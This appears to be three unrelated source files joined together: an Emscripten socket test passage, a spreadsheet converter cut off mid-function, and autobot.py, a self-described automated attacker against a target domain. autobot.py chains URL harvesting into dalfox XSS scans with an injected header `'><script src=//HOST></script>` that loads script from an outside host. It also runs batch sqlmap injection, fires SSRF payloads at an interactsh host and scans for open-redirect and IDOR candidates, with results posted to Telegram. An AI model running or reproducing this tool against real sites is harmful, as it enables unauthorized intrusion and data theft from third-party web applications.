(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1'], 49163), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 49160), 0)]
for harness, datagram in harnesses:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, sockets_include])
def test_sdl2_sockets_echo(self):
harness = CompiledServerHarness('sdl2_net_server.c', ['-s', 'USE_SDL=2', '-s', 'USE_SDL_NET=2'], 49164)
with harness:
self.btest('sdl2_net_client.c', expected='0', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_NET=2', '-DSOCKK=%d' % harness.listen_port])
def test_sockets_async_echo(self):
# Run with ./runner.py sockets.test_sockets_async_echo
sockets_include = '-I' + path_from_root('tests', 'sockets')
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ASYNC=1'], 49167), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1', '-DTEST_ASYNC=1'], 49168), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1', '-DTEST_ASYNC=1'], 49169), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_ASYNC=1'], 49166), 0)]
for harness, datagram in harnesses:
print('harness:', harness)
with harness:
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, '-DTEST_ASYNC=1', sockets_include])
# Deliberately attempt a connection on a port that will fail to test the error callback and getsockopt
print('expect fail')
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=49169', '-DTEST_ASYNC=1', sockets_include])
def test_sockets_echo_bigdata(self):
sockets_include = '-I' + path_from_root('tests', 'sockets')
# generate a large string literal to use as our message
message = ''
for i in range(256 * 256 * 2):
message += str(unichr(ord('a') + (i % 26)))
# re-write the client test with this literal (it's too big to pass via command line)
input_filename = path_from_root('tests', 'sockets', 'test_sockets_echo_client.c')
input = open(input_filename).read()
output = input.replace('#define MESSAGE "pingtothepong"', '#define MESSAGE "%s"' % message)
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49172), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49173), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 49171), 0)]
for harness, datagram in harnesses:
with harness:
self.btest(output, expected='0', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram], force_c=True)
@flaky
@no_windows('This test is Unix-specific.')
def test_sockets_partial(self):
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_partial_server.c'), [], 49180),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_partial_server.c'), [], 49181)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_partial_client.c'), expected='165', args=['-DSOCKK=%d' % harness.listen_port])
@flaky
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_down(self):
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_select_server_down_server.c'), [], 49190, do_server_check=False),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_select_server_down_server.c'), [], 49191)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_select_server_down_client.c'), expected='266', args=['-DSOCKK=%d' % harness.listen_port])
@flaky
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_closes_connection_rw(self):
sockets_include = '-I' + path_from_root('tests', 'sockets')
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49200),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49201)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_select_server_closes_connection_client_rw.c'), expected='266', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port])
@no_windows('This test uses Unix-specific build architecture.')
def test_enet(self):
# this is also a good test of raw usage of emconfigure and emmake
shared.try_delete(self.in_dir('enet'))
shutil.copytree(path_from_root('tests', 'enet'), self.in_dir('enet'))
with chdir(self.in_dir('enet')):
run_process([PYTHON, path_from_root('emconfigure'), './configure'])
run_process([PYTHON, path_from_root('emmake'), 'make'])
enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + path_from_root('tests', 'enet', 'include')]
for harness in [
CompiledServerHarness(os.path.join('sockets', 'test_enet_server.c'), enet, 49210)
]:
with harness:
self.btest(os.path.join('sockets', 'test_enet_client.c'), expected='0', args=enet + ['-DSOCKK=%d' % harness.listen_port])
# This test is no longer in use for WebSockets as we can't truly emulate
# a server in the browser (in the past, there were some hacks to make it
# somewhat work, but those have been removed). However, with WebRTC it
# should be able to resurect this test.
# def test_enet_in_browser(self):
# shared.try_delete(self.in_dir('enet'))
# shutil.copytree(path_from_root('tests', 'enet'), self.in_dir('enet'))
# pwd = os.getcwd()
# os.chdir(self.in_dir('enet'))
# run_process([PYTHON, path_from_root('emconfigure'), './configure'])
# run_process([PYTHON, path_from_root('emmake'), 'make'])
# enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + path_from_root('tests', 'enet', 'include')]
# os.chdir(pwd)
# run_process([PYTHON, EMCC, path_from_root('tests', 'sockets', 'test_enet_server.c'), '-o', 'server.html', '-DSOCKK=2235'] + enet)
# def make_relay_server(port1, port2):
# print('creating relay server on ports %d,%d' % (port1, port2), file=sys.stderr)
# proc = run_process([PYTHON, path_from_root('tests', 'sockets', 'socket_relay.py'), str(port1), str(port2)])
# return proc
# with WebsockifyServerHarness('', [], 2235, 2234):
# with WebsockifyServerHarness('', [], 2237, 2236):
# pids = []
# try:
# proc = make_relay_server(2234, 2236)
# pids.append(proc.pid)
# self.btest(os.path.join('sockets', 'test_enet_client.c'), expected='0', args=['-DSOCKK=2237', '-DUSE_IFRAME=1'] + enet)
# finally:
# clean_pids(pids);
def test_webrtc(self): # XXX see src/settings.js, this is disabled pending investigation
self.skipTest('WebRTC support is not up to date.')
host_src = 'webrtc_host.c'
peer_src = 'webrtc_peer.c'
host_outfile = 'host.html'
peer_outfile = 'peer.html'
host_filepath = path_from_root('tests', 'sockets', host_src)
temp_host_filepath = os.path.join(self.get_dir(), os.path.basename(host_src))
with open(host_filepath) as f:
host_src = f.read()
with open(temp_host_filepath, 'w') as f:
f.write(self.with_report_result(host_src))
peer_filepath = path_from_root('tests', 'sockets', peer_src)
temp_peer_filepath = os.path.join(self.get_dir(), os.path.basename(peer_src))
with open(peer_filepath) as f:
peer_src = f.read()
with open(temp_peer_filepath, 'w') as f:
f.write(self.with_report_result(peer_src))
open(os.path.join(self.get_dir(), 'host_pre.js'), 'w').write('''
var Module = {
webrtc: {
broker: 'http://localhost:8182',
session: undefined,
onpeer: function(peer, route) {
window.open('http://localhost:8888/peer.html?' + route);
// iframe = document.createElement("IFRAME");
// iframe.setAttribute("src", "http://localhost:8888/peer.html?" + route);
// iframe.style.display = "none";
// document.body.appendChild(iframe);
peer.listen();
},
onconnect: function(peer) {
},
ondisconnect: function(peer) {
},
onerror: function(error) {
console.error(error);
}
},
setStatus: function(text) {
console.log('status: ' + text);
}
};
''')
open(os.path.join(self.get_dir(), 'peer_pre.js'), 'w').write('''
var Module = {
webrtc: {
broker: 'http://localhost:8182',
session: window.location.toString().split('?')[1],
onpeer: function(peer, route) {
peer.connect(Module['webrtc']['session']);
},
onconnect: function(peer) {
},
ondisconnect: function(peer) {
// Calling window.close() from this handler hangs my browser, so run it in the next turn
setTimeout(window.close, 0);
},
onerror: function(error) {
console.error(error);
},
},
setStatus: function(text) {
console.log('status: ' + text);
}
};
''')
run_process([PYTHON, EMCC, temp_host_filepath, '-o', host_outfile] + ['-s', 'GL_TESTING=1', '--pre-js', 'host_pre.js', '-s', 'SOCKET_WEBRTC=1', '-s', 'SOCKET_DEBUG=1'])
run_process([PYTHON, EMCC, temp_peer_filepath, '-o', peer_outfile] + ['-s', 'GL_TESTING=1', '--pre-js', 'peer_pre.js', '-s', 'SOCKET_WEBRTC=1', '-s', 'SOCKET_DEBUG=1'])
# note: you may need to run this manually yourself, if npm is not in the path, or if you need a version that is not in the path
run_process([NPM, 'install', path_from_root('tests', 'sockets', 'p2p')])
broker = Popen(NODE_JS + [path_from_root('tests', 'sockets', 'p2p', 'broker', 'p2p-broker.js')])
expected = '1'
self.run_browser(host_outfile, '.', ['/report_result?' + e for e in expected])
broker.kill()
def test_nodejs_sockets_echo(self):
# This test checks that sockets work when the client code is run in Node.js
# Run with ./runner.py sockets.test_nodejs_sockets_echo
if NODE_JS not in JS_ENGINES:
self.skipTest('node is not present')
sockets_include = '-I' + path_from_root('tests', 'sockets')
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 59162), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 59164), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59160), 0)]
# Basic test of node client against both a Websockified and compiled echo server.
for harness, datagram in harnesses:
with harness:
run_process([PYTHON, EMCC, path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram], stdout=PIPE, stderr=PIPE)
out = run_js('client.js', engine=NODE_JS, full_output=True)
self.assertContained('do_msg_read: read 14 bytes', out)
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
# Test against a Websockified server with compile time configured WebSocket subprotocol. We use a Websockified
# server because as long as the subprotocol list contains binary it will configure itself to accept binary
# This test also checks that the connect url contains the correct subprotocols.
print("\nTesting compile time WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59166)
]:
with harness:
run_process([PYTHON, EMCC, path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '-s', 'SOCKET_DEBUG=1', '-s', 'WEBSOCKET_SUBPROTOCOL="base64, binary"', '-DSOCKK=59166'], stdout=PIPE, stderr=PIPE)
out = run_js('client.js', engine=NODE_JS, full_output=True)
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained(['connect: ws://127.0.0.1:59166, base64,binary', 'connect: ws://127.0.0.1:59166/, base64,binary'], out)
# Test against a Websockified server with runtime WebSocket configuration. We specify both url and subprotocol.
# In this test we have *deliberately* used the wrong port '-DSOCKK=12345' to configure the echo_client.c, so
# the connection would fail without us specifying a valid WebSocket URL in the configuration.
print("\nTesting runtime WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59168)
]:
with harness:
open(os.path.join(self.get_dir(), 'websocket_pre.js'), 'w').write('''
var Module = {
websocket: {
url: 'ws://localhost:59168/testA/testB',
subprotocol: 'text, base64, binary',
}
};
''')
run_process([PYTHON, EMCC, path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '--pre-js', 'websocket_pre.js', '-s', 'SOCKET_DEBUG=1', '-DSOCKK=12345'], stdout=PIPE, stderr=PIPE)
out = run_js('client.js', engine=NODE_JS, full_output=True)
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained('connect: ws://localhost:59168/testA/testB, text,base64,binary', out)
|
autobot.py
|
#!/usr/bin/python3
from libs.telegramText import NotifyBot, SendDocumentBot, CheckTokens, GetTokens
import libs.coloredOP as co
from pathlib import Path
from zipfile import ZipFile
from halo import Halo
import threading
import os
import datetime
import re
import requests
import subprocess
import argparse
import sys
### GLOBAL VARS
CONFIGPath = "/root/notificationConfig.ini"
TELEGRAMTokens = False
TELEGRAM_KEYS = {}
###
def executeCommand(COMMAND, CallerFunc, verbose=False):
try:
subprocess.run(COMMAND, shell=True, check=True, text=True, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
if verbose:
print("\t"+co.bullets.OK, co.colors.GREEN+"Command Executed Successfully."+co.END)
except subprocess.CalledProcessError as e:
print("\t"+co.bullets.ERROR, co.colors.BRED+"{} : Error During Command Execution.!!".format(CallerFunc)+co.END)
print(e.output)
return
def ValideteDomain(domain):
regex = "^((?!-)[A-Za-z0-9-]{1,63}(?<!-)\\.)+[A-Za-z]{2,6}"
d = re.compile(regex)
if(re.search(d, domain)):
return True
else:
return False
def CompressFile(FName, Files):
with ZipFile(FName, mode="w") as zf:
for f in Files:
zf.write(f)
def CollectURLS(Domain):
# collecting urls using waybackurls
CallerFunc = "ColllectURLS"
COMMAND = 'echo {} | waybackurls | egrep -v ".css|.png|.jpeg|.jpg|.svg|.gif|.ttf|.woff|.woff2|.eot|.otf|.ico|.js" >> temp_urls.txt'.format(Domain)
executeCommand(COMMAND, CallerFunc)
## Collecting urls from gau
COMMAND = 'gau -b css,png,jpeg,jpg,svg,gif,ttf,woff,woff2,eot,otf,ico,js {} | anew -q temp_urls.txt'.format(Domain)
executeCommand(COMMAND, CallerFunc)
# use qsreplace to remove duplicates
COMMAND = 'cat temp_urls.txt | sed -e "s/=.*/=/" -e "s/URL: //" | qsreplace -a >> urls.txt 2>&1'
executeCommand(COMMAND, CallerFunc)
# deleting extra file
os.remove("temp_urls.txt")
# count number of lines
numOfLines = open("urls.txt", "r").read().count("\n")-1
global TELEGRAMTokens
global TELEGRAM_KEYS
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : {} URLs collected for {}".format(numOfLines, Domain))
def XSSAttack(Domain, BlindXSS=None):
CallerFunc = "XSSAttack"
global TELEGRAMTokens
global TELEGRAM_KEYS
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : XSS Scan Started on target {}".format(Domain))
COMMAND = 'cat urls.txt | gf xss | httpx -mc 200,201,202,300,301,302 -silent >> xss_urls.txt'
executeCommand(COMMAND, CallerFunc)
if BlindXSS:
# checking xss using dalfox including blind xss
COMMAND = 'dalfox file xss_urls.txt -b {} -o xss_dalfox.txt -H \"referrer: xxx\'><script src=//{}></script>\" 2>&1 /dev/null'.format(BlindXSS, BlindXSS)
executeCommand(COMMAND, CallerFunc)
else:
# checking xss using dalfox for stored and reflected xss
COMMAND = 'dalfox file xss_urls.txt -o xss_dalfox.txt 2>&1 /dev/null'
executeCommand(COMMAND, CallerFunc)
# checking with kxss
COMMAND = 'cat xss_urls.txt | kxss >> xss_kxss.txt 2>&1 /dev/null'
executeCommand(COMMAND, CallerFunc)
# compress files
FName = "{}_xss.zip".format(Domain)
if os.path.isfile("xss_dalfox.txt") and os.path.isfile("xss_kxss.txt"):
CompressFile(FName, ['xss_dalfox.txt', 'xss_kxss.txt'])
os.remove("xss_dalfox.txt")
os.remove("xss_kxss.txt")
else:
if os.path.isfile("xss_dalfox"):
CompressFile(FName, ['xss_dalfox.txt'])
os.remove("xss_dalfox.txt")
elif os.path.isfile("xss_kxss.txt"):
CompressFile(FName, ['xss_kxss.txt'])
os.remove("xss_kxss.txt")
# cleaning extra files
os.remove("xss_urls.txt")
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : XSS Scan Finished on target {} ✅".format(Domain))
if os.path.isfile(FName):
if os.path.getsize(FName) < 52428800:
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : Download XSS Scan Result : {}".format(FName))
SendDocumentBot(TELEGRAM_KEYS, FName)
else:
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : XSS Scan Result file {} is bigger then 50MB!!, Download it manually from Server ℹ️".format(FName))
def SQLInjection(Domain):
CallerFunc = "SQLInjection"
global TELEGRAMTokens
global TELEGRAM_KEYS
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : SQLi Scan Started on target {}".format(Domain))
executeCommand('cat urls.txt | gf sqli | httpx -mc 200,201,202,300,301,302 -silent >> sqli_urls.txt 2>&1 /dev/null', CallerFunc)
# perform sql injection attack on target
executeCommand('sqlmap -m sqli_urls.txt --batch --random-agent --level 1 >> sqli_result.txt 2>&1 /dev/null', CallerFunc)
# compress files
FName = "{}_sqli.zip".format(Domain)
if os.path.isfile("sqli_result.txt"):
CompressFile(FName, ['sqli_result.txt'])
os.remove("sqli_result.txt")
os.remove("sqli_urls.txt")
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : SQLi Scan Finished on target {} ✅".format(Domain))
if os.path.isfile(FName):
if os.path.getsize(FName) < 52428800:
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : Download SQLi Scan Result : {}".format(FName))
SendDocumentBot(TELEGRAM_KEYS, FName)
else:
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : SQLi Scan Result file {} is bigger then 50MB!!, Download it manually from Server ℹ️".format(FName))
def SSRFScan(Domain, InteractSH):
CallerFunc = "SSRFScan"
global TELEGRAMTokens
global TELEGRAM_KEYS
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : SSRF Scan Started on target {}".format(Domain))
executeCommand('cat urls.txt | gf ssrf | httpx -mc 200,201,202,300,301,302 -silent >> ssrf_urls.txt', CallerFunc)
COMMAND = 'cat ssrf_urls.txt | qsreplace "https://{}" >> ssrf_paylod_urls.txt 2>&1 /dev/null'.format(InteractSH)
executeCommand(COMMAND, CallerFunc)
executeCommand('ffuf -c -w ssrf_paylod_urls.txt -u FUZZ -o ssrf_fuzz_result.txt 2>&1 /dev/null', CallerFunc)
# cleaning extra files
os.remove("ssrf_urls.txt")
os.remove("ssrf_paylod_urls.txt")
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : SSRF Scan Finished on target {} ✅".format(Domain))
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : Check Your intactsh instance for any Hit!!")
def OpenRedirect(Domain):
CallerFunc = "OpenRedirect"
global TELEGRAMTokens
global TELEGRAM_KEYS
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : Open-Redirect Started on target {}".format(Domain))
executeCommand('cat urls.txt | gf redirect | httpx -mc 200,201,202,300,301,302 -silent >> openredirect_urls.txt', CallerFunc)
# compress files
FName = "{}_openRedirect.zip".format(Domain)
if os.path.isfile("openredirect_urls.txt"):
CompressFile(FName, ['openredirect_urls.txt'])
os.remove("openredirect_urls.txt")
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : Open-Redirect Scan Finished on target {} ✅".format(Domain))
if os.path.isfile(FName):
if os.path.getsize(FName) < 52428800:
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : Download OpenRedirect Scan Result {} for manual analysis.".format(FName))
SendDocumentBot(TELEGRAM_KEYS, FName)
else:
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : OpenRedirect Scan Result file {} is bigger then 50MB!!, Download it manually from Server ℹ️".format(FName))
def IDORScan(Domain):
CallerFunc = "IDORScan"
global TELEGRAMTokens
global TELEGRAM_KEYS
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : IDORScan Started on target {}".format(Domain))
executeCommand('cat urls.txt | gf idor | httpx -mc 200,201,202,300,301,302 -silent >> idor_urls.txt', CallerFunc)
# compress files
FName = "{}_idor.zip".format(Domain)
if os.path.isfile("idor_urls.txt"):
CompressFile(FName, ['idor_urls.txt'])
os.remove("idor_urls.txt")
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : IDOR Scan Finished on target {} ✅".format(Domain))
if os.path.isfile(FName):
if os.path.getsize(FName) < 52428800:
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : Download IDOR Scan Result {} for manual analysis.".format(FName))
SendDocumentBot(TELEGRAM_KEYS, FName)
else:
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : IDOR Scan Result file {} is bigger then 50MB!!, Download it manually from Server ℹ️".format(FName))
def Banner():
print(co.colors.BLUE+"################################################################################"+co.END)
print(co.colors.GREEN+"""
d8888 888 888888b. 888
d88888 888 888 "88b 888
d88P888 888 888 .88P 888
d88P 888 888 888 888888 .d88b. 8888888K. .d88b. 888888
d88P 888 888 888 888 d88""88b 888 "Y88b d88""88b 888
d88P 888 888 888 888 888 888 888 888 888 888 888
d8888888888 Y88b 888 Y88b. Y88..88P 888 d88P Y88..88P Y88b.
d88P 888 "Y88888 "Y888 "Y88P" 8888888P" "Y88P" "Y888 """+co.colors.RED+"Version 0.1\n"+co.END)
print("# "+co.BOLD+"Author : "+co.colors.CYAN+"Ajay Kumar Tekam [ ajaytekam.github.io ]"+co.END)
print("# "+co.BOLD+"Blog : "+co.colors.CYAN+"https://sec-art.net/"+co.END)
print("# "+co.BOLD+"About Tool : "+co.colors.CYAN+"Perform Automated Checks for XSS, SQLI, OpenRedirect, SSRF, IDOR."+co.END)
print(co.colors.BLUE+"################################################################################\n"+co.END)
def printInfo(Domain, OPDir):
print(co.bullets.INFO, co.colors.CYAN+"Target Domain : {}".format(Domain)+co.END)
print(co.bullets.INFO, co.colors.CYAN+"Result Dir : {}".format(OPDir)+co.END)
class MyParser(argparse.ArgumentParser):
def error(self, message):
Banner()
sys.stderr.write('error: %s\n' % message)
self.print_help()
sys.exit(2)
def main():
parser = MyParser()
parser.add_argument("-d", "--domain", help="Domain name to perform Attack", type=str, required=True)
parser.add_argument("-o", "--out", help="Output directory name", type=str)
parser.add_argument("-b", "--blind", help="XSS hunter URL for Blind XSS inection Testing", type=str, default=None)
parser.add_argument("-i", "--interactSH", help="InteractSH URL for Catching SSRF", type=str, required=True)
args = parser.parse_args()
# Check argument
if args.domain is None and args.interactSH is None:
Banner()
parser.print_help()
sys.exit()
## GLOBAL Vars
Banner()
tDomain = "" # raw domain name
OPDir = "" # Output Directory
# validae url
if(ValideteDomain(args.domain)):
tDomain = args.domain
else:
print(co.bullets.ERROR, co.colors.BRED+" Invalid Domain:{}".format(args.url)+co.END)
sys.exit()
# get the http protocol
try:
tempD = requests.head("https://"+tDomain, allow_redirects=True, timeout=8)
Domain = tempD.url
Domain = re.sub(":443/$", "", Domain)
except:
try:
tempD = requests.head("http://"+tDomain, allow_redirects=True, timeout=8)
Domain = tempD.url
Domain = re.sub(":80/$", "", Domain)
except:
print(co.bullets.ERROR, co.colors.BRED+" Error : Could not resolve the Http protocol.!!"+co.END)
sys.exit(1)
# check talegram keys
global CONFIGPath
global TELEGRAMTokens
global TELEGRAM_KEYS
retVal = CheckTokens(CONFIGPath)
if retVal == 1:
print(co.bullets.DONE+co.colors.GREEN+" Telegram API Keys found."+co.END)
TELEGRAMTokens = True
apiToken, chatID = GetTokens(CONFIGPath)
TELEGRAM_KEYS['apiToken'] = apiToken
TELEGRAM_KEYS['chatID'] = chatID
elif retVal == 2:
print(co.bullets.ERROR+co.colors.RED+" Telegram Bot keys not found.!1"+co.END)
elif retVal == 3:
print(co.bullets.ERROR+co.colors.RED+" Telegram Bot Config File not found.!1"+co.END)
# Sending telegram message
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "🥷 AutoBot : Automated attcker staretd for domain : {}".format(tDomain))
# Create output dir
if args.out is not None:
OPDir = args.out
if os.path.isdir(OPDir):
print(co.bullets.INFO+co.colors.CYAN+" {} already exists...".format(OPDir)+co.END)
print(co.bullets.INFO+co.colors.CYAN+" Adding time-stamp into the directory name as suffix"+co.END)
Date = str(datetime.datetime.now())
WORKDIR = re.sub("-|:|\.|\ ", "_", Date)
OPDir += "_{}".format(WORKDIR)
else:
OPDir = "./autobot_{}".format(tDomain)
if os.path.isdir(OPDir):
print(co.bullets.INFO+co.colors.CYAN+" {} already exists...".format(OPDir)+co.END)
print(co.bullets.INFO+co.colors.CYAN+" Adding time-stamp into the directory name as suffix"+co.END)
Date = str(datetime.datetime.now())
WORKDIR = re.sub("-|:|\.|\ ", "_", Date)
OPDir += "_{}".format(WORKDIR)
os.mkdir(OPDir)
printInfo(Domain, OPDir)
#################
# Change directory
os.chdir(OPDir)
# Setting-up the spinner
spinner = Halo(text=' ', spinner='dots')
print(co.bullets.INFO+co.colors.CYAN+" Collecting Target Domain URLs.."+co.END)
spinner.start()
## Collecting urls gg
CollectURLS(tDomain)
spinner.stop()
print(co.bullets.DONE+co.colors.GREEN+" URLs Collected.."+co.END)
spinner.start()
## strat XSS scan
t1 = threading.Thread(target=XSSAttack, args=(tDomain, args.blind,))
t1.start()
spinner.stop()
print(co.bullets.INFO+co.colors.CYAN+" XSS Scan Started.."+co.END)
spinner.start()
## start SQLi scan
t2 = threading.Thread(target=SQLInjection, args=(tDomain,))
t2.start()
spinner.stop()
print(co.bullets.INFO+co.colors.CYAN+" SQLi Scan Started.."+co.END)
spinner.start()
## start SSRF Scan
t3 = threading.Thread(target=SSRFScan, args=(tDomain,args.interactSH,))
t3.start()
spinner.stop()
print(co.bullets.INFO+co.colors.CYAN+" SSRF Scan Started.."+co.END)
spinner.start()
## Open redirect scan
t4 = threading.Thread(target=OpenRedirect, args=(tDomain,))
t4.start()
spinner.stop()
print(co.bullets.INFO+co.colors.CYAN+" Open Redirect Scan Started.."+co.END)
spinner.start()
# IDOR Scan
t5 = threading.Thread(target=IDORScan, args=(tDomain,))
t5.start()
spinner.stop()
print(co.bullets.INFO+co.colors.CYAN+" IDOR Scan Started.."+co.END)
spinner.start()
t1.join()
t2.join()
t3.join()
t4.join()
t5.join()
spinner.stop()
print(co.bullets.INFO+co.colors.CYAN+" IDOR Scan Started.."+co.END)
print(co.bullets.DONE+co.colors.GREEN+" All Scan Completed"+co.END)
spinner.start()
os.chdir("..")
files = os.listdir(OPDir)
try:
CompressFile("{}_autobot.zip".format(OPDir), files)
spinner.stop()
print(co.bullets.DONE+co.colors.GREEN+" Resultfile : {}_autobot.zip".format(OPDir)+co.END)
spinner.start()
shutil.rmtree(OPDir)
except:
spinner.stop()
print(co.bullets.DONE+co.colors.GREEN+" Resultfile : {}".format(OPDir)+co.END)
spinner.start()
spinner.stop()
if TELEGRAMTokens:
NotifyBot(TELEGRAM_KEYS, "✅ AutoBot Scan Completed for : {}".format(tDomain))
print(co.bullets.DONE+co.colors.GREEN+" AutoBot Scan Completed."+co.END)
if __name__ == "__main__":
main()
|
convertor.py
|
# !pip3 install xlrd
import pandas as pd
import numpy as np
from pathlib import Path
import os
from threading import Thread
from queue import Queue
import multiprocessing
# !pip3 install khayyam
from khayyam import JalaliDate, JalaliDatetime
xcelLocation = "../xcels/"
!export xcelLocation="../xcels/"
HEADER = ["symbol", "name", "amount", "volume", "value", "lastday", "open", "close",
"last-change", "last-percent", "ending", "ending-change", "ending-percent",
"min", "max",]
HEADER_extra = HEADER + ["year", "month", "day", "date"]
!ls $xcelLocation | grep ".xlsx" > xlFiles
tmp = !cat xlFiles
names = [name[:-5] for name in tmp]
def cleaner():
for name in names:
if os.path.getsize(xcelLocation + name + '.xlsx') < 10000:
os.remove(xcelLocation + name + '.xlsx')
def convert(xcelLocation, xlFileName, returnAllMode=False):
xl = None
try:
if (not Path(xcelLocation + xlFileName + '.csv').is_file()) or returnAllMode:
xl = pd.read_excel(xcelLocation + xlFileName + ".xlsx",
header=[0], skiprows=[0,1], convert_float=False)
xl.columns = HEADER
xl.to_csv(xcelLocation + xlFileName + '.csv', encoding='utf-8', index=False, header=HEADER)
except:
xl = str(xlFileName)
finally:
return xl
def convertThread(threadname, q, qDFs, qErrors):
while not q.empty():
fileNames = q.get()
q.task_done()
for name in fileNames:
tmp = convert(xcelLocation=xcelLocation, xlFileName=name, returnAllMode=True)
if isinstance(tmp, str):
qErrors.put(tmp)
else:
qDFs.put((tmp.copy(), name))
print(str(threadname) + " done")
def convert_all(batchSize=10, numThread=16):
all_dfs = []
all_df_names = []
i = 0
workers = []
pool = multiprocessing.Pool(processes=numThread)
m = multiprocessing.Manager()
queue = m.Queue()
qDFs = m.Queue()
qErrors = m.Queue()
while i*batchSize < len(names):
if (i+1)*batchSize < len(names):
queue.put(names[i*batchSize:(i+1)*batchSize])
else:
queue.put(names[i*10:])
i+=1
print(len(names))
print(queue.qsize())
for i in range(numThread):
# workers.append(Thread(target=readThread, args=("Thread-" + str(i), queue, qsum, qcount)))
